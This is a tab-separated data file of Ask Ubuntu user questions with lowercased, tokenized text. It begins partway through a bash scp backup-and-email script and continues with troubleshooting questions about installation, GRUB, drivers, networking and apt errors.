had error ) echo `` copy process of $ bkfile from $ remotefqdn has failed with result : $ exitstatus1 '' > > $ bklog 2 > & 1 else # ( transfer process was successful ) echo `` copy process of $ bkfile from $ remotefqdn is successful with resulte : $ exitstatus1 '' > > $ bklog 2 > & 1 fi # transfer the $ bkfile.err file ( error log ) exitstatus2= '' '' scp root @ $ remotefqdn : $ remotebkdir1/ $ bkfile.err $ localbkdir/ $ remotesysname/ $ bkfile.err > > $ bklog 2 > & 1 # ( copy the error file ) exitstatus2= $ ? if [ `` $ exitstatus2 '' -ne 0 ] ; then # ( transfer process had error ) echo `` copy process of $ errlog from $ remotefqdn has failed with result : $ exitstatus2 '' > > $ bklog 2 > & 1 else # ( transfer process was successful ) echo `` copy process of $ errlog from $ remotefqdn is successful with resulte : $ exitstatus2 '' > > $ bklog 2 > & 1 fi echo `` `date` : transferring $ bkfile and $ errlog from $ remotesysname to $ sysnamee completed . '' > > $ bklog 2 > & 1 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # verify transfer process worked echo `` `date` : verifying copy function ... .. '' > > $ bklog 2 > & 1 if [ `` $ exitstatus1 '' == 0 ] & & [ `` $ exitstatus2 '' == 0 ] ; then # ( transfer of both files were successful ) echo `` transfer of files to $ sysname was successful . '' > > $ bklog 2 > & 1 # send mail report [ [ -z $ 1 ] ] & & subject= '' : - ) success : backup report for $ remotefqdn from $ sysname '' [ [ -z $ 2 ] ] & & recipient= '' user2 @ domain.local '' [ [ -z $ 3 ] ] & & mail_body= '' backup & transfer successful for $ remotefqdn on $ month $ day $ year . transferred : // $ remotefqdn $ remotebkdir1/ $ bkfile ( size $ results kb ) to // $ sysname/ $ localbkdir/ $ remotesysname '' if [ `` $ mailenabled '' == true ] ; then echo `` sending mail for successful transfer '' > > $ bklog 2 > & 1 build_message | sendmail -t -oi fi else # ( at least one file failed to transfer ) echo `` transfer of files to $ sysname failed . check $ bklog for more details . '' > > $ bklog 2 > & 1 # send mail report attachments= ( `` $ bklog '' `` $ localbkdir/ $ remotesysname/ $ bkfile.err '' ) [ [ -z $ 1 ] ] & & subject= '' : - ( error : backup report for $ remotefqdn from $ sysname '' [ [ -z $ 2 ] ] & & recipient= '' user2 @ domain.local '' [ [ -z $ 3 ] ] & & mail_body= '' backup or transfer failed for $ remotefqdn . check the log at $ bklog '' if [ `` $ mailenabled '' == true ] ; then echo `` sending mail for failed transfer '' > > $ bklog 2 > & 1 build_message | sendmail -t -oi fi fi # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # cleanup variables exitstatus1= '' '' exitstatus2= '' '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # end logging statement echo `` `date` : script $ 0 ended '' $ bklog 2 > & 1 echo `` **************************************************************************** '' > > $ bklog 2 > & 1 update : when i run run-parts -- test /etc/cron.daily i get the following list . /etc/cron.daily/apt /etc/cron.daily/apt-show-versions /etc/cron.daily/aptitude /etc/cron.daily/dpkg /etc/cron.daily/logrotate /etc/cron.daily/ntp /etc/cron.daily/passwd /etc/cron.daily/sendmail /etc/cron.daily/upstart my custom scripts are not listed .
502597	how can i use bmg cs-09 evdo modem in ubuntu 14.04 ?	bus 003 device 004 : id 05c6:1000 qualcomm , inc. mass storage device is show but it says modem not dected . my modem : - network type : cdma 1x-evdo , usb2.0 connector quad-band : cdma 800/1900mhz
502598	how to make partitions on ubuntu 12.04 while installing it	i have hp probook 445 g1 with factory installed ubuntu 12.04 . i do n't know how my pc did n't boot one day . so i planned to reinstall ubuntu 12.04 . but unknowingly i installed 12.04.4 while i wanted to install 12.04.2 now i want to install 12.04.2 and want to know how to make partitions . if someone can post screenshot that will be so helpful to me . also one thing more the ubuntu 12.04 which i got factory installed has hp_tools and hp_recovery partition and in the grub menu it shows recovery and restore to factory state option . i want to have that option too . so that the ubuntu which i install now completely looks as factory state .
502600	`` make '' error when bundling a packge	i m trying to install soundtouch package but i m having some problems i m following their instruction on how to compile soundtouch after unzipping the file . it tells me to ./configure - configures the soundtouch package for the local environment . make - builds the soundtouch library & soundstretch utility . make install - installs the soundtouch & bpm libraries to /usr/local/lib and soundstretch utility to /usr/local/bin . please notice that 'root ' privileges may be required to install the binaries to the destination locations . i did the first step but when i run make , it gives me errors . james @ bum-ho : ~/pitch shifter/soundtouch $ make cd . & & automake-1.10 -- foreign /bin/bash : line 4 : automake-1.10 : command not found make : *** [ makefile.in ] error 1 what could be the problem ? i looked up to see if i had automake installed and i did so i dont understand what is going on .
502604	ubuntu installed on usb hard drive can not suspend	i 'm trying to make suspension working with an installation of ubuntu 14.04 64bit on external usb hard drive 2.5 '' . the standby works good , but after wake up it does n't recognize/find the hard disk and there are several ext4 errors . is there any method to solve this ?
502608	how to get rid of `` device or resource busy '' during setup of loop device ?	what could be the reason for device or resource busy during setup of a sparse file with losetup /dev/loop4 /path/to/sparse_file.img when losetup -a shows that no loop devices are in use and the system has been rebooted ? i 'm on ubuntu 14.04 with util-linux 2.20.1 .
502609	what is a simple command/process i can run to prevent ubuntu from sleeping ?	i want to make simple `` sleep '' script for ubuntu . so i can watch hulu and the machine will not suspend or turn off the display . i think i can figure out most of it , but this part i do n't even know where to start . i need a simple command or process i can start , that will keep the computer awake , and the screen on , until i kill . so that i can run this for as long as i want the computer on then after that time it will go to sleep like normal . not sure if i explained that well , let me know if it needs clarification .
502611	is there a temp file in ubuntu ?	this have happen to me many times : i should pass the result of one command to file . after using result via that , that becomes useless . so i should remove that in order to make my directory clean : - { | but the point is i forget delete that file . is there any way in ubuntu to handle this problem ?
502612	unable to install ubuntu desktop 14.04	i downloaded ubuntu desktop when i try to run `` setup2.exe '' i will receive an error message which says `` an error has occurred '' . based on this limited information what do i do find and correct the problem ?
502619	ubuntu 14.04 desktop not automatically renewing dhcp lease	sometimes my laptops networking just stops . i fix it by doing sudo ifdown em1 sudo ifup em1 the strange thing is , in previous releases and other *nix distros that usually doesnt produce an prompt that tells me the dhcp lease is being renewed . now it is . to renew a dhcp lease before i had to do dhclient -r but that 's beside the point , which is i have to renew the lease manually . this is not normal behavior . how can i fix this ?
502621	ubuntu 14.04 freezes when checking for update	well , i went to details under system settings , and my everything froze . i can not move my mouse nor get to the tty with ctrl-alt-f1 . i reset my pc and tried again , and the same thing happened ! considering that it opened the details program but did n't finish checking for updates , i assume that 's what 's causing it . upon running sudo apt-get update & & sudo apt-get dist-upgrade , it gave me an error that said `` dpwn was interrupted , you must manually run 's u do dpwn -- configure -a ' to correct the problem . when i ran that command , the computer froze again ! specs : amd fx-8320 , 8gb ram , gtx 760
502623	update : disabling all tooltips in xfce	i was apprehensive to try this : http : //forums.debian.net/viewtopic.php ? p=310078 because it appeared it would lead me here : https : //bugzilla.xfce.org/show_bug.cgi ? id=8192 . deciding i could n't deal with the tooltips ( major reason i do n't use chrome browser ) i went ahead and created a file .gtkrc-2.0 in my home folder then entered in gtk-enable-tooltips = 0 , did a reboot and all is well , no apparent bug as described ; i can drag and drop , access folders and files from desktop , etc . running a clean install of xubuntu less than a week old , i 'm assuming the patch has been implemented . as an aside , if you 're looking to disable tooltips in firefox , type about : config into the address bar , uncheck warn me next time or whatever it says on the way in ( there will be a next time ... .. ) and put browser.chrome.toolbar_tips into the search box at the top of the page . double click on this setting to toggle to false then restart firefox .
502626	connect to peap connection with inner authentification mschapv2 using only terminal	anyone has an idea how can i do this on ubuntu 14.04 with no gui installed ? the connection uses simple user < - > password authentication with no certificate .
502627	from ubuntu 14.04 to 14.04.1	sorry if i did n't post right i am new to ubuntu forums my question is how to upgrade from ubuntu 14.04 to ubuntu 14.04.1 , this .1 version has just been released a few hours ago , and my software updates sees no new update i want to say that my notification setting is , ,for long-term support version '' thank you !
502628	uk iso mechanical keyboard layout on 14.04	i 'm trying to configure ubuntu 14.04 to use with the keyboard layout shown here uk keyboard layout . i ca n't find any options from the list of english ( uk ) keyboard layouts that match this format , despite it being common in the uk . a similar question was posted on the unbuntu forums but it seems that the uk-iso format may have been dropped . if that 's the case , can alternative layouts be added through some other means ?
502629	wired connection disabled after setting static ip	after i configured the static ip address , i did something that prevents the network from starting . run sudo lshw -c network -sanitize : *-network disabled description : ethernet interface run ifconfig : only lo shows up run ifconfig -a : lo shows up pl7pl shows up wlan0 shows up the files i 've adjusted are /etc/network/interfaces to set static ip , then back to dhcp /etc/hosts , added machine name and static ip , then changed it back . somewhere pl7pl was written in one of the files , but ca n't find it .
502636	generally-accepted way of giving a user rwx permissions to /etc	i need a non-root user ( say , myuser ) to be able to have unbridled , recursive rwx access to /etc and anything underneath it . hence if i execute , say : mkdir /etc/fizz i should n't receive any `` permission denied '' error . my solution is a bit complicated , but nevertheless : create a new group of users called etcusers . add myuser and root to etcusers . change the ownership ( recursively ) of /etc to belong to etcusers . is this really the best , or most generally-accepted way of doing this ? seems a bit complicated .
502638	how to make sure , that grub always starts the default entry after a timeout ?	when booting the ubuntu system went wrong and the user is forced to cut off power , there is a feature , that disables automatic selection of grub menu upon next boot . normally this is a nice feature to have , but sometimes it gets triggered when i power on the system remotely via wol . is there any way to disable it ?
502640	error message when excuting sudo apt-get update	whenever i execute sudo apt-get update i get this error message : w : failed to fetch http : //ppa.launchpad.net/jolicloud-team/ppa/ubuntu/dists/natty/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i 've checked my /etc/apt/sources.list file , but there is no reference to http : //ppa.launchpad.net/jolicloud-team . could anyone help me ?
502643	htc 7 mozart + ubuntu	will ubuntu work on htc 7 mozart which is windows phone ? and how to install ubuntu on that specific smartphone ? thank you .
502644	internet connection problem in ubuntu 12.04 and 14.04	i had ubuntu 12.04 previously installed on my laptop and i was having problems in connecting to internet ( i was connecting to wifi ) , and chrome and firefox both showed `` connection to server lost '' , and when i tried updating through terminal it was also not able to connect to internet , but my bittorrent client was connecting fine to wifi internet connection . so i installed ubuntu 14.04 alongside windows 7 and i 'm having same problem in it also . also if i try disconnecting to wifi and connect again , internet works fine for 5-10 minutes but then again it starts giving error . also , there is no problem in internet connection as it is working fine with my android device and windows 7 . here is some of my lspci -v output : the full output can be found here . the script output can be found here .
502645	wireless driver issue for ubuntu 14.04	http : //pastebin.ubuntu.com/7857714/ i am having the same problem and as suggested i copied and pasted the code in the terminal and above is the link to the file it got created as wireless-info.text basically i am having a wireless driver issue and i read my wireless/wifi connection does not work . what information is needed to diagnose the issue ? on d above page as in what to do and at the very first point mentioned i am stuck.can anyone help ?
502647	why is thunar the default file manager in xubuntu ?	what was the reasoning behind using thunar as the default file manager in xubuntu ( compared to ubuntu 's default of nautilus ) . unless i have mistakenly installed it ( if so , likely as another application 's dependency ) , nautilus seems to be installed on xubuntu by default , but is unused . is thunar more performance friendly than nautilus ? or is thunar simply continuing to be used because it has been the default for xubuntu since 6.06 ?
502654	`` invalid pixel format string '' when encoding a sequence of .pngs with avconv	i have a sequence of .pngs and i want to encode them into a video using the h264 codec . after a bit of googling i found that the proper incantation for doing this is avconv -f image2 -i frame_ % 08d.png -c : v h264 -crf 1 -r 24 out.mov but if i try this i get the following error : [ buffer @ 0x1919a40 ] invalid pixel format string '-1' error opening filters ! do i need to add extra options to get the .pngs to encode ? i looked at the avconv help files but find them rather intimidating and hard to understand . i 've uploaded the first .png here in case there is a problem with the input files , although the .pngs open just fine in eye of gnome . the version of avconv i am using is the one you get from the ubuntu package manager : avconv version 9.14-6:9.14-0ubuntu0.14.04.1 , copyright ( c ) 2000-2014 the libav developers built on jul 15 2014 13:57:40 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 )
502655	mouse & program windows problem [ cant do antything ]	the programs windows keep flickering back and forth/up and down and my mouse keeps flashing also , and i need to go on a different account to do this , is there any way to fix it ?
502658	usb modem driver problem ubuntu 14.04	i am using zte usb modem which comes with our local network operator grameenphone ( grameenphone.com ) . in ubuntu 12.04 , i am use this modem properly . but in ubuntu 14.04 , after installing the modem driver , the application named grameenphone internet ( application > grameenphone ) can not run . this the driver link i am try to install , https : //docs.google.com/file/d/0b6f9ymb1zd0rwfdndhv0ugpnwtq/edit ? pli=1 trying to install with terminal http : //i.stack.imgur.com/023sh.jpg
502659	how do i refresh the package list ?	i am download a java package and in order to update i need to refresh the package list . how do i do that ?
502661	ubuntu cuda issue	i am using ubuntu 14.04 and cuda 6.0 and i met this issue : if i install the package from cuda website , i can use cuda function well but the desktop ( unity ) will crash , which force me to install a cuda stable version instead . but a cuda stable version did n't support all the functions , for example : /usr/local/cuda-6.0/samples/1_utilities/devicequery/devicequery it showsl - > cuda driver version is insufficient for cuda runtime version
502665	fix broken grub on usb stick mounting lvm from the hardrive	i have an ubuntu 12.04 system which works this way : /boot is on a usb stick partitions / , /home , and swap are on the harddrive , on an encrypted lvm recently an update messed up grub on the usb stick leaving it unusable . i 'm trying to recover it with a live cd , but after following every posible guides i found ( https : //help.ubuntu.com/community/grub2/installing among many others ) and looking for help at irc i 'm still stuck . this is what i 've done so far : sudo -s < pass > cryptsetup luksopen /dev/sda3 sda3 < pass > mount /dev/mapper/ $ cryptname-root /mnt mount /dev/sdc1 /mnt/boot mount /dev/mapper/ $ cryptname-home /mnt/home for i in /dev /dev/pts /proc /sys /run ; do sudo mount -b $ i /mnt $ i ; done cp /etc/resolv.conf /mnt/etc/resolv.conf chroot /mnt ls # everything seems ok at this point grub-install /dev/sdc grub-install -- recheck /dev/sdc update-grub everything works fine up to this last point where i can see what grub is adding to the menăş , and it 's only finding my secondary os ( a windows 7 ) . i do n't even care for w7 to show on this grub because it can boot by itself if i remove the stick from the pc . i also tried some variations for the grub-install command , but none worked diferently . what am i missing to let grub notice the installed linux in my hardrive ? thanks in advance for any help !
502668	i got a `` failed to copy files ... possibly an old hard hard drive ... '' error during installation and now it says my hard drive is full	i am new to ubuntu and linux in general . i have built a simple computer to try ubuntu out . i tried to install ubuntu through a usb flash drive . during the installation i got an error saying : '' failed to copy files ... possibly an old hard hard drive ... '' after restarting my computer the installer says i do n't have enough space on my hard drive and i am not able to format it . any suggestions ?
502669	getting the names of users on apt-get logs	i am administering a ubuntu server ( trusty ) where several users have been given permission to run apt-get , but only two administrators have full sudo permission . i want to keep track of who installs what on the server . the /var/log/apt/history.log maintains a log of what apt-get commands were run . however , this does not keep track of the user who ran the command . is there a work around this ?
502670	how can i diagnose sudden `` power off '' problem ?	i have one of the new haswell nucs running 14.04 , and once every couple days the box just turns off . the monitors and other devices keep running , but the box is just off . i looked through syslog , but i could n't find any relevant events . what steps should i take to diagnose the problem ?
502672	stress test question	i am a newbie , and am busy converting to linux after seeing my friend work on it . i bought a second hand cheap machine from a lady at my work , it runs , i just want to stress test to see that nothing fails . i have read the stress function and have installed it . my question is , what would be the best test for this core 2 dell optiplex 755 , it has 3gb of ram and a 160gb hard hdd . i found this and wonder if it would be good to run . stress -c 2 -m 2 -d 1 -t 40s
502676	ca n't seem to add node to maas w/o pxe	is there any way of installing maas on a already up and running ubuntu server 14.04 ( e.g . install maas , add the mac address , configure and so forth ) ?
502677	installing ubuntu on unbootable xp	i hope you can help me because i 'm getting really frustrated here . i 've decided to turn to ubuntu since i 'm fed up with a bsod my xp is giving me for a few days now , but i ca n't get through the install process . that bsod i 'm speaking of is happening during the windows xp loading screen so i ca n't even get to the point where i type the password to access my pc . the only way i can get access to my computer is through safe mode and that 's where i 'm writing from right now . 1st i must say that my cd/dvd drive is broken , so i ca n't go that way . 2nd i 've tried booting ubuntu from usb pendrive , first by unetbootin then by universal usb installer , but in both cases nothing happens - when i press boot from usb in bios , my pc is stuck on second loading screen ( the one you have just before windows xp logo loading screen ) . so here 's my question . can i install ubuntu from xp safe mode without using usb or cd ? i know about the live cd option and it would work perfectly fine but as i said before i can only work on safe mode and live cd requests pc restart . and when i do that , i get bsod before my current os logs on . please help me if you can , because i got to the point where i want to throw my computer out the window . e/ sorry for any possible language mistakes
502678	where to install the bootloader ? windows 8.1 and ubuntu 14.04	so i have decided to attempt to install ubuntu alongside my windows 8.1 lenovo e545 . i was following this guide http : //www.dedoimedo.com/computers/dual-boot-windows-8-ubuntu.html . i was looking at my partition table and saw something odd . the boot loader is n't on the /dev/sda1 it appears to be on /dev/sda2 unlike in the tutorial . i am not a partition genius so should i install it on sda2 or sda1 like the tutorial says ? here is a picture of the partitions http : //imgur.com/ofouh7p
502679	unparseable output from pylint in emacs	i just upgraded from ubuntu 12.04 to 14.04 ( clean upgrade , not in-place ) . i found that i could n't call pylint from within emacs ( m-x pylint ) as i used to , so i installed the package python-mode . now i can call pylint from emacs , but even when i make it include line numbers ( pylint -f parseable foo.py ) , emacs ca n't jump to the next error using next-error . when i try , i get the following error in the minibuffer : '' no buffers contain error message locations . '' any suggestions of what i can do to fix this would be much appreciated . googling around only shows tips on how to get flymake to run pylint , which i 'm not interested in doing . for reference , here 's a sample of what i see in the pylint output window in emacs : no config file found , using default configuration /usr/lib/python2.7/dist-packages/pylint/reporters/text.py:79 : userwarning : parseable output format is deprecated . this is equivalent to -- msg-template= { path } : { line } : [ { msg_id } ( { symbol } ) , { obj } ] { msg } 'to -- msg-template= % s ' % ( self.name , self.line_format ) ) ************* module video_demo video_demo.py:21 : [ e0602 ( undefined-variable ) , matplotlibdisplay.__init__ ] undefined variable 'figure' video_demo.py:25 : [ e0602 ( undefined-variable ) , matplotlibdisplay.update ] undefined variable 'axes' video_demo.py:28 : [ e0602 ( undefined-variable ) , matplotlibdisplay.update ] undefined variable 'figure' video_demo.py:35 : [ e0213 ( no-self-argument ) , videodisplay.update ] method should have `` self '' as first argument video_demo.py:50 : [ e1103 ( maybe-no-member ) ,
502682	live usb wo n't connect to a network created by other ubuntu laptop	i have a laptop running 12.04 and i created a network using the wifi-direct feature . i can connect other laptops to it , cellphones , toasters , washermachines , just about everything . except a another laptop running ubuntu off a live usb . i am just wondering if anyone has had this issue before and if anyone knows how to fix this issue . oh and another thing , i can create a wifi network with the laptop running the live usb , and connect devices to it as well . but it will just not connect to another `` hotspot '' created by another ubuntu laptop . thank you .
502683	profile not working with gnome3 terminal	i created a profile in ubuntu unity 14.04 to give a transperent background and black in color . when i apply in unity it works but as i was repeating it with gnome 3 terminal noting is happening i am getting same gnome ( white solid background ) terminal window . is the terminal in gnome does not support this or is there any other problem
502684	dejadupe with gdocs	i have duplicity working with my google docs storage but i ca n't seem to configure deja dup to use that also . my duplicity command is duplicity -v8 /home/ [ username ] /documents/ gdocs : // [ google_username ] @ gmail.com/backup i do n't see an option in the deja dup interface but this seems like it should be in there . thoughts ?
502686	ubuntu 14.04 : : grub loader is not visible	the grub loader in my ubuntu 14.04 is not visible .there is a blank screen at the time of starting and automatically directing to ubuntu login page .
502687	installing 2 versions of ubuntu on same hard drive ?	i have a dilemma and i do n't know what to do . currently i have ubuntu 14.04 64 bit installed along side windows 7 64 bit and everything works wonderfully . i recently started a course about assembly on linux and the professor recommended downloading ubuntu 12.04 32 bit . i downloaded the iso file and loaded it on to a usb . when i first installed ubuntu 14.04 , it gave me the following 3 options : 1 ) install ubuntu alongside windows 2 ) delete window and install ubuntu 3 ) something else i choose the first option . however , when i attempted to install ubuntu 12.04 32bit along side ubuntu 14.04 64 bit and windows 64 bit , the first option was gone . instead i was given the following 3 options : 1 ) delete 14.04 and install 12.04 in its place 2 ) delete both 14.04 and windows 7 and install 12.04 as replacement 3 ) something else my question is this : is it advisable to install ubuntu 12.04 32 bit along side ubuntu 14.04 64 bit and windows 7 as the ubuntu installer no longer gives me this option ? should i just go ahead and replace 14.04 with 12.04 for the duration of time that i would need it . i do n't want to delete 14.04 but i will if need be . i also like the current dual boot option ubuntu has put in place so if making a 4th partition through way of `` something else '' would delete that , i would much rather delete 14.04 to make room for 12.04 . again my preference would be to have ubuntu 12.04 32 bit appear alongside ubuntu 14.04 64 bit and windows 7 when i boot my computer , but short of that , i would settle for ubuntu 12.04 32 bit appearing alongside windows 7 for the time being . i look forward to your advice .
502688	wimax soft blocked help	i have an hp pavillion dm4 and the wimax is soft blocked . how do i unblock it so that i can connect to wifi ? i have already tried the command rfkill unblock all and it did not work . i can connect with an ethernet cable but not the built in wireless card . please help .
502690	ca n't access my windows 8 files on ubuntu 14	error mounting /dev/sda8 at /media/shaswat/new volume : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda8 '' `` /media/shaswat/new volume '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda8 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i ca n't access any files on my windows 8 machine on ubuntu . i tried to shut down windows once again and booting ubuntu but it was of no help . is it possible that i can access the files ?
502695	upgrade from 13.04 to 14.04 system crashes	since upgrade to 14.04 system crashes when i try to do anything that requires internet . it is a wired connection . i also can not get terminal to run or to boot from a burned dvd to override the current . without any of these i have no idea what to do . my computer has two hard drives with windows on one and ubuntu on the other . windows is fine .
502696	ubuntu gui 14.04 reboots	i 'm an ubuntu newbie . i have to install version 14.04 on an old machine , with only a scsi cd-rom and no usb boot capabilities , so an external dvd unit is out of question . i had to choose the server version ( fits on a cd ) and try to install xubuntu-desktop over the network . after installing ubuntu 14.04 server from scratch ( ok ) i run the command sudo apt-get install xubuntu-desktop and everything seems to go well . after the first roboot , however , i ca n't get to the login screen , as the gui environment keeps rebooting . tried 2 times , first with an installation in english and then in my native language ( portuguese-brasil ) and got the same result . any ideas ? how can i stop the gui from getting in the way and make the changes i need via cli ? thank you .
502700	how to triple boot ubuntu , os x mavericks and windows 8.1 ?	i just bought a new macbook pro and have decided to triple boot my old hp g62 ( ~4 years old ) with mavericks , ubuntu , and windows 8 . my hp was previously running windows 7 , but in the process of trying to boot ubuntu onto it , i deleted windows 7 and now the computer is only running ubuntu . i 'm not ultimately concerned about windows 7 being gone forever , but i want to know how i should go about triple booting this computer . should i start by booting windows or os x first ? and how can i make a usb boot stick for either of these ? i would like to find a way to do this without using my macbook and just using my hp as i do n't want to download anything to my new computer that might contain a virus . note : i know i most likely will have to partition my hard drive for this , but when i look in gparted , it says that my /dev/sda5 is nearly full when i know this is not the case as i completely cleared the hard drive before installing ubuntu . i am not able to create an unallocated partition larger than 4 mib , and i am unable to deactivate /dev/sda5 , which is listed as `` lvm2 pv '' file type and `` ubuntu-vg '' mount point . did i not install ubuntu correctly ? i believe my /dev/sda1 is where ubuntu is installed because the file system is `` ext2 '' and the mount point is `` /boot '' .
502706	how to resize a partition on a server without a display ?	i 've recently run into an issue where i need to resize a partition on a server , but the issue is , it has no gui so i can not use gparted . what should i do in this case ? so i get it that you should use parted . however , how exactly do you use the parted command ? what does it mean by start and end ?
502708	how to add the entry for windows 8 to grub	thanks for your time . i have ubuntu 12.04 , and reinstalled windows 8 for a few exclusive programs that work with products i have bought . i reinstalled grub-efi on my uefi system . everything works fine , but in order to boot into win8 i have to change the boot option in uefi to windows boot loader ( on /dev/sda1 ) . for some reason grub is not seeing win8 . i have used boot repair 's recommended repair in the past and it has messed up my boot options ( i.e . i had to reinstall my os ) , so i would prefer if i can just edit the grub config option manually .
502710	i cant install anything from the ubuntu software centre please help	whenever i try to install anything it just says `` use this source '' and when i select it it comes up with this ( i am running on ubuntu 13.04 ) failed to download repository information check your internet connection . w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found [ ip : 194.169.254.10 80 ] , w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found [ ip : 194.169.254.10 80 ] and more but im not aloud to post the whole thing
502712	how to configure openvpn on ubuntu 14.04	how can i configure openvpn on ubuntu 14.04 ? root @ suzz-system-product-name : /home/suzz # sudo apt-get install openvpnreading package lists ... done building dependency tree reading state information ... done openvpn is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 15 not fully installed or removed . need to get 0 b/1,849 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y dpkg : error processing package libqt5gui5 : i386 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration dpkg : dependency problems prevent configuration of libqt5widgets5 : i386 : libqt5widgets5 : i386 depends on libqt5gui5 ( > = 5.2.0 ) | libqt5gui5-gles ( > = 5.2.0 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . dpkg : error processing package libqt5widgets5 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt5opengl5 : i386 : libqt5opengl5 : i386 depends on libqt5gui5 ( > = 5.2.0 ) | libqt5gui5-gles ( > = 5.2.0 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . libqt5opengl5 : i386 depends on libqt5widgets5 ( > = 5.0.2 ) ; however : package libqt5widgets5 : i386 is not configured yet . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : error processing package libqt5opengl5 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt5printsupport5 : i386 : libqt5printsupport5 : i386 depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . libqt5printsupport5 : i386 depends on libqt5widgets5 ( > = 5.2.0 ) ; however : package libqt5widgets5 : i386 is not configured yet . dpkg : error processing package libqt5printsupport5 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt5quick5 : i386 : libqt5quick5 : i386 depends on libqt5gui5 ( > = 5.2.0 ) ; however : package libqt5gui5 : i386 is not configured yet . dpkg : error processing package libqt5quick5 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qtdeclarative5-privatewidgets-plugin : i386 : no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5gui5 ( > = 5.2.0 ) | libqt5gui5-gles ( > = 5.2.0 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5quick5 ( > = 5.2.0 ) | libqt5quick5-gles ( > = 5.2.0 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . qtdeclarative5-privatewidgets-plugin : i386 depends on libqt5widgets5 ( > = 5.2.0 ) ; however : package libqt5widgets5 : i386 is not configured yet . dpkg : error processing package qtdeclarative5-privatewidgets-plugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qtdeclarative5-dialogs-plugin : i386 : qtdeclarative5-dialogs-plugin : i386 depends on qtdeclarative5-privatewidgets-plugin ; however : package qtdeclarative5-privatewidgets-plugin : i386 is not configured yet . qtdeclarative5-dialogs-plugin : i386 depends on libqt5guno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already i5 ( > = 5.2.0 ) | libqt5gui5-gles ( > = 5.2.0 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . qtdeclarative5-dialogs-plugin : i386 depends on libqt5quick5 ( > = 5.2.0 ) | libqt5quick5-gles ( > = 5.2.0 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . dpkg : error processing package qtdeclarative5-dialogs-plugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qtdeclarative5-qtquick2-plugin : i386 : qtdeclarative5-qtquick2-plugin : i386 depends on libqt5quick5 ( > = 5.0.2 ) | libqt5quick5-gles ( > = 5.0.2 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . dpkg : error processing package qtdeclarative5-qtquick2-plugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qtdeclarative5-window-plugin : i386 : qtdeclarative5no apport report written because maxreports is reached already no apport report written because maxreports is reached already -window-plugin : i386 depends on libqt5quick5 ( > = 5.0.2 ) | libqt5quick5-gles ( > = 5.0.2 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . dpkg : error processing package qtdeclarative5-window-plugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hud : hud depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . hud depends on libqt5widgets5 ( > = 5.0.2 ) ; however : package libqt5widgets5 : i386 is not configured yet . dpkg : error processing package hud ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of liboxideqtcore0 : i386 : liboxideqtcore0 : i386 depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . dpkg : error processing package liboxideqtcore0 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of liboxideqt-qmlplugin : i386 : liboxideqt-qmlplugin : i386 depends on liboxideqtcore0 ( = 1.0.4-0ubuntu0.14.04.1 ) ; however : package 